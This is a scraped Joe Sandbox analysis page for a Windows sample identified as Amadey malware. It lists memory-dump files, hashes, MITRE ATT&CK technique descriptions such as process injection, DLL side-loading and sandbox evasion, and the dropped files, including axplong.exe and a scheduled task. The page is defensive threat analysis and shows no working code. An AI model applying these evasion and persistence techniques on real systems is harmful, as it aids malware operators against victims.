Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 30b4098a3b60f7d4545154ada1203da5e376d264b69281a03df472b3c2fe31ae
Instruction ID: 830ab71f19afa56969015de0cc98c4142e24f253836abb1e7e7a2a7bc91b7e18
Opcode Fuzzy Hash: 30b4098a3b60f7d4545154ada1203da5e376d264b69281a03df472b3c2fe31ae
Instruction Fuzzy Hash: 77214F75A012099FDF10EFA4DC859AEBBB8EF18710F104165FA41A72E1DBB0AD418FA1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

C:\Windows\Tasks\axplong.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
file.exe

Function 000FBD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Function 000F5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 000F7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00126E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 000F82B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00126C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00126F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 00106AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Function 04AE0CEC Relevance: .1, Instructions: 80
COMMON